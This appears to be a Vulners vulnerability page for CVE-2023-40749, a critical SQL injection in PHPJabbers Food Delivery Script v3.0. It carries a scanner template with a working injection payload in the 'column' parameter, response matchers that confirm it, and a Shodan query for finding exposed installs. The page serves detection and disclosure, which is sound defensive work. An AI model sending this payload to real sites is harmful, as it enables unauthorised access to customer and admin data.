| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2023-40749 | 28 Aug 202313:15 | – | attackerkb | |
| CVE-2023-40749 | 28 Aug 202316:16 | – | circl | |
| Food Delivery Script SQL注入漏洞 | 28 Aug 202300:00 | – | cnnvd | |
| CVE-2023-40749 | 28 Aug 202300:00 | – | cve | |
| CVE-2023-40749 | 28 Aug 202300:00 | – | cvelist | |
| CVE-2023-40749 | 28 Aug 202313:15 | – | nvd | |
| CVE-2023-40749 | 28 Aug 202313:15 | – | osv | |
| Sql injection | 28 Aug 202313:15 | – | prion | |
| CVE-2023-40749 | 23 May 202504:14 | – | redhatcve | |
| CVE-2023-40749 | 28 Aug 202300:00 | – | vulnrichment |
id: CVE-2023-40749
info:
name: PHPJabbers Food Delivery Script v3.0 - SQL Injection
author: ritikchaddha
severity: critical
description: |
PHPJabbers Food Delivery Script v3.0 is vulnerable to SQL Injection in the "column" parameter of index.php.
impact: |
Unauthenticated attackers can exploit SQL injection in the column parameter to extract sensitive database information including customer orders, payment details, delivery addresses, and admin credentials from the Food Delivery platform.
remediation: |
Update PHPJabbers Food Delivery Script to a version newer than 3.0 that properly sanitizes the column parameter and uses parameterized queries.
reference:
- https://medium.com/@tfortinsec/multiple-vulnerabilities-in-phpjabbers-part-3-40fc3565982f
- https://nvd.nist.gov/vuln/detail/CVE-2023-40749
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-40749
cwe-id: CWE-89
epss-score: 0.03306
epss-percentile: 0.87056
cpe: cpe:2.3:a:phpjabbers:food_delivery_script:3.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: html:"PHPJabbers"
vendor: phpjabbers
product: food_delivery_script
tags: cve,cve2023,phpjabbers,food-delivery,sqli,vuln
http:
- method: POST
path:
- "{{BaseURL}}/index.php?controller=pjAdminOrders%26action%3dpjActionGetNewOrder%26column%3d(SELECT+(CASE+WHEN+(4213%3d4213)+THEN+0x63726561746564+ELSE+(SELECT+7877+UNION+SELECT+7153)+END))%26direction%3dASC%26page%3d1%26rowCount%3d50%26q%3d’’%26type%3d"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "class <strong>pjAdminOrdersaction"
- "didn't exists"
condition: and
- type: status
status:
- 200
# digest: 490a00463044022010d6bbe729d695711c6c0b2a6dee5c1cad79047a3361b6002a8d809e5f1cf77f02200e336c1f3a0521386e2a44650b9375f9967d7cfc19d52de04f029d4703bd6060:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation